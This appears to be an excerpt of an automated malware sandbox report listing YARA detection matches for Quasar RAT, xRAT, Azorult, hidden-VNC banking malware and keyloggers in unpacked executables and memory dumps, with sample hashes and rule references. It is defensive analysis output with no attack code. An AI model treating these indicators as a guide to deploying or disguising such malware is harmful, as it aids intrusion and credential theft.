Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
